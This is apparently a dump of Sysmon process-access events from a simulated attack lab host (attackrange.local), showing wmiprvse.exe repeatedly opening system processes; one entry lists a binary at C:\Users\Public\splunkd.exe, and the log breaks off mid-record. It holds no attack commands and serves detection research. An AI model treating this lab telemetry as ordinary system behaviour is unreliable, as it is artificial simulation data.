Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150192Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1320-60CA-0E01-00000000D101}1072C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150191Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150190Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150189Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150188Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150187Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDF-60CA-9000-00000000D101}4560C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150186Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDF-60CA-9000-00000000D101}4560C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150185Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDB-60CA-8D00-00000000D101}648C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150184Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDB-60CA-8D00-00000000D101}648C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150183Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150182Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150181Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150180Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150179Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8600-00000000D101}2996C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150178Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8600-00000000D101}2996C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150177Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8300-00000000D101}3672C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150176Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8300-00000000D101}3672C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150175Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD7-60CA-8000-00000000D101}3628C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150174Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD7-60CA-8000-00000000D101}3628C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150173Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD7-60CA-7E00-00000000D101}2840C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150172Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD7-60CA-7E00-00000000D101}2840C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150171Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F6F-60CA-6300-00000000D101}3116C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150170Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F6F-60CA-6300-00000000D101}3116C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150169Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:37.638{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F6F-60CA-6200-00000000D101}3968C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microso